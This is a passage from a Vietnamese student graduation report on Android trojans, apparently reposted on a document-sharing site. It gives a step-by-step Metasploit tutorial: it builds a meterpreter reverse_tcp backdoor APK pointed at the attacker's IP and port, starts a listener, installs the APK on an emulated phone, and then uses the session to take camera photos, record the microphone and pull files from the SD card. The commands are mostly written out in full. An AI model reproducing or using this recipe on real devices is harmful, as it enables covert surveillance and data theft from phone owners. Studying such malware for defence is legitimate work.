Tạo mã độc trên Kali Linux để xâm nhập Android

Một phần của tài liệu Báo cáo tốt nghiệp: Nghiên cứu Trojan, Malware cho phép đánh cắp dữ liệu trên HĐH Android (Trang 31)

I. NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP

5. NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID

5.3 Tạo mã độc trên Kali Linux để xâm nhập Android

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network

Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk

192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.

Tiếp theo, gõ lệnhmsfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 –nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080– nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Galaxy nexus giả lập, tải vềfiles.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp:

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnhSysInfo

Sử dụng camera:

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở/root của máy

Ghi âm

Để thực hiện ghi âm, nhập lênhrecord_micvà file ghi âm sẽ được lưu về máy

Lấy file từ sd card

Dùng lệnhcd /sdcard/Downloadđể vào thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Một phần của tài liệu Báo cáo tốt nghiệp: Nghiên cứu Trojan, Malware cho phép đánh cắp dữ liệu trên HĐH Android (Trang 31)

Tải bản đầy đủ (PDF)

(56 trang)